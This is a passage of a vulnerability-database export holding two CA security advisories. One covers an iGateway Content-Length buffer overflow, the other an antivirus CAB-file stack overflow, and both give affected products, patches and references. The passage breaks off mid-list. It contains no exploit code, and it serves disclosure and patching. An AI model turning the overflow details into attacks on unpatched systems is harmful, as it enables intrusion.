2006-01-26\n\nDiscovered By: Erika Mendoza reported this issue to iDefense. \n\n\nMitigating Factors: None. \n\n\nSeverity: CA has given this vulnerability a Medium risk rating. \n\n\nAffected Technologies: Please note that the iGateway component is\nnot a product, but rather a common component that is included \nwith multiple products. The iGateway component is included in \nthe following CA products, which are consequently potentially \nvulnerable. \n\n\nAffected Products:\n\nBrightStor ARCserve Backup r11.5\nBrightStor ARCserve Backup r11.1\nBrightStor ARCserve Backup for Windows r11\nBrightStor Enterprise Backup 10.5\nBrightStor ARCserve Backup v9.01\nBrightStor ARCserve Backup Laptop \u0026 Desktop r11.1\nBrightStor ARCserve Backup Laptop \u0026 Desktop r11\nBrightStor Process Automation Manager r11.1\nBrightStor SAN Manager r11.1\nBrightStor SAN Manager r11.5\nBrightStor Storage Resource Manager r11.5\nBrightStor Storage Resource Manager r11.1\nBrightStor Storage Resource Manager 6.4\nBrightStor Storage Resource Manager 6.3\nBrightStor Portal 11.1\n\nNote to BrightStor Storage Resource Manager and BrightStor Portal\nusers: In addition to the application servers where these products \nare installed, all hosts that have iSponsors deployed to them for \nmanaging applications like Veritas Volume Manager and Tivoli TSM \nare also affected by this vulnerability. \n\neTrust Products:\neTrust Audit 1.5 SP2 (iRecorders and ARIES)\neTrust Audit 1.5 SP3 (iRecorders and ARIES)\neTrust Audit 8.0 (iRecorders and ARIES)\neTrust Admin 8.1\neTrust Identity Minder 8.0\neTrust Secure Content Manager (SCM) R8\neTrust Integrated Threat Management (ITM) R8\neTrust Directory, R8.1 (Web Components Only)\n\nUnicenter Products:\nUnicenter CA Web Services Distributed Management R11\nUnicenter AutoSys JM R11\nUnicenter Management for WebLogic / Management for WebSphere R11\nUnicenter Service Delivery R11\nUnicenter Service Level Management (USLM) R11\nUnicenter Application Performance Monitor R11\nUnicenter Service Desk R11\nUnicenter Service Desk Knowledge Tools R11\nUnicenter Asset Portfolio Management R11\nUnicenter Service Metric Analysis R11\nUnicenter Service Catalog/Assure/Accounting R11\nUnicenter MQ Management R11\nUnicenter Application Server Management R11\nUnicenter Web Server Management R11\nUnicenter Exchange Management R11\n\n\nAffected platforms:\nAIX, HP-UX, Linux Intel, Solaris, and Windows\n\n\nStatus and Recommendation: \nCustomers with vulnerable versions of the iGateway component \nshould upgrade to the current version of iGateway (4.0.051230 or \nlater), which is available for download from the following \nlocations:\nhttp://supportconnect.ca.com/\nftp://ftp.ca.com/pub/iTech/downloads/\n\n\nDetermining the version of iGateway:\nTo determine the version numbers of the iGateway components:\n\nGo to the igateway directory:\n\nOn windows, this is %IGW_LOC%\nDefault path for v3.*: C:\\Program Files\\CA\\igateway\nDefault path for v4.*: \nC:\\Program Files\\CA\\SharedComponents\\iTechnology\n\nOn unix, \nDefault path for v3.*: \t/opt/CA/igateway\nDefault path for v4.*: \tthe install directory path is contained in \nopt/CA/SharedComponents/iTechnology.location. \nThe default path is /opt/CA/SharedComponents/iTechnology\n\nLook at the \u003cVersion\u003e element in igateway.conf. \n\nThe versions are affected by this vulnerability if you see \na value LESS THAN the following: \n\u003cVersion\u003e4.0.051230\u003c/Version\u003e (note the format of v.s.YYMMDD)\n\n\nReferences: \n(note that URLs may wrap)\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nhttp://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_not\nice.asp\n\nCAID: 33778\nCAID Advisory link: \nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778\n\nCVE Reference: CVE-2005-3653\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3653\n\nOSVDB Reference: OSVDB-22688\nhttp://osvdb.org/22688\n\niDefense Reference:\nComputer Associates iTechnology iGateway Service Content-Length \nBuffer Overflow\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=376\n\n\nChangelog:\nv1.0 - Initial Release\nv1.1 - Removed several unaffected technologies; added more \nreference links. \n\n\nCustomers who require additional information should contact CA \nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory,\nplease send email to vuln@ca.com, or contact me directly. \n\nIf you discover a vulnerability in CA products, please report\nyour findings to vuln@ca.com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDir. of CA Vulnerability Research Team\n\n\nCA, One Computer Associates Plaza. Islandia, NY 11749\n\t\nContact http://www3.ca.com/contact/\nLegal Notice http://ca.com/calegal.htm\nPrivacy Policy http://www.ca.com/caprivacy.htm\nCopyright 2006 CA. All rights reserved",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
}
],
"trust": 1.44
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-3653",
"trust": 2.1
},
{
"db": "BID",
"id": "16354",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "22688",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "18591",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1015526",
"trust": 1.7
},
{
"db": "SREASON",
"id": "380",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-0311",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-14861",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "43303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "43468",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"id": "VAR-200512-0273",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:54:14.773000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA iTechnology iGateway Service negative Content-Length Repair measures for field value buffer error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146825"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.idefense.com/intelligence/vulnerabilities/display.php?id=376"
},
{
"trust": 1.9,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/16354"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/423403/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/423288/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_notice.asp"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/22688"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015526"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18591"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/380"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/0311"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24269"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=full-disclosure\u0026m=113803349715927\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/423403"
},
{
"trust": 0.3,
"url": "/archive/1/423288"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=full-disclosure\u0026amp;m=113803349715927\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/314/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5912/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3099/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3391/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5913/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5911/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5906/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5904/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5905/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/18591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5908/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5909/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5942/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5910/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/313/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-3653"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://ca.com/calegal.htm"
},
{
"trust": 0.1,
"url": "http://www.ca.com/caprivacy.htm"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_not"
},
{
"trust": 0.1,
"url": "http://osvdb.org/22688"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/contact/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/securityadvisor/vulninfo/submit.aspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-14861"
},
{
"date": "2006-01-23T00:00:00",
"db": "BID",
"id": "16354"
},
{
"date": "2006-01-25T06:44:12",
"db": "PACKETSTORM",
"id": "43303"
},
{
"date": "2006-01-29T22:15:05",
"db": "PACKETSTORM",
"id": "43468"
},
{
"date": "2005-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"date": "2005-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-14861"
},
{
"date": "2007-06-27T19:38:00",
"db": "BID",
"id": "16354"
},
{
"date": "2021-04-14T15:41:53.463000",
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA iTechnology iGateway Service negative Content-Length Field value buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
}
}
VAR-200706-0018
Vulnerability from variot - Updated: 2023-12-18 13:45Stack-based buffer overflow in the Anti-Virus engine before content update 30.6 in multiple CA (formerly Computer Associates) products allows remote attackers to execute arbitrary code via a large invalid value of the coffFiles field in a .CAB file. There are several affected products. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA has issued an update to address the vulnerabilities. The first vulnerability, CVE-2007-2863, is due to insufficient bounds checking on filenames contained in a CAB archive. The second vulnerability, CVE-2007-2863, is due to insufficient bounds checking on the "coffFiles" field. By using a specially malformed CAB file, an attacker can cause a crash or take unauthorized action on an affected system.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a High risk rating.
Affected Products: CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8, r8.1 CA Anti-Virus 2007 (v8) eTrust EZ Antivirus r7, r6.1 CA Internet Security Suite 2007 (v3) eTrust Internet Security Suite r1, r2 eTrust EZ Armor r1, r2, r3.x CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Protection Suites r2, r3 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus Gateway) 7.1 Unicenter Network and Systems Management (NSM) r3.0 Unicenter Network and Systems Management (NSM) r3.1 Unicenter Network and Systems Management (NSM) r11 Unicenter Network and Systems Management (NSM) r11.1 BrightStor ARCserve Backup r11.5 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup r11 for Windows BrightStor Enterprise Backup r10.5 BrightStor ARCserve Backup v9.01 CA Common Services CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)
Affected Platforms: All
Status and Recommendation: CA has issued content update 30.6 to address the vulnerabilities. The updated engine is provided with content updates. Ensure the latest content update is installed if the signature version is less than version 30.6.
For BrightStor ARCserve Backup:
- To update the signatures one time only, open a command window, change into the "C:\Program Files\CA\SharedComponents\ScanEngine" directory, and enter the following command:
inodist /cfg inodist.ini
-
To update on a regular schedule:
-
Submit a GenericJob using the ARCserve Job Scheduler. Please search the BrightStor Administrator's Guide for 'Antivirus Maintenance' and follow the directions.
Or
- Use the above command line instruction with the AT Scheduler.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for this vulnerability: Security Notice for CA products implementing the Anti-Virus engine http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securit ynotice.asp CA Security Advisor posting: CA Anti-Virus Engine CAB File Buffer Overflow Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680 CAID: 35395, 35396 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396 Reported By: ZDI ZDI Advisory: ZDI-07-034, ZDI-07-035 http://www.zerodayinitiative.com/advisories/ZDI-07-034.html http://www.zerodayinitiative.com/advisories/ZDI-07-035.html CVE References: CVE-2007-2863, CVE-2007-2864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864 OSVDB References: OSVDB-35244, OSVDB-35245 http://osvdb.org/35244 http://osvdb.org/35245
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFGaCc7eSWR3+KUGYURAnegAKCFM9tJ6RgdwIAc9JRfOcx807pEHwCdHofV s2hnGDiljhAMZquR9D1uya8= =PQi4 -----END PGP SIGNATURE----- . More details can be found at:
http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp
-- Disclosure Timeline: 2007.02.16 - Vulnerability reported to vendor 2007.06.05 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by an anonymous researcher.
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster@3com.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0018",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "computer associates",
"version": null
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r2"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "9.01"
},
{
"model": "etrust antivirus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.5"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r60a"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r61"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r62"
},
{
"model": "vpn-1 power/utm",
"scope": "eq",
"trust": 0.8,
"vendor": "check point",
"version": "(pro/express) ngx r65"
},
{
"model": "etrust antivirus",
"scope": null,
"trust": 0.7,
"vendor": "computer associates",
"version": null
},
{
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.1"
},
{
"model": "integrated threat management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates integrated threat management r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust antivirus r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
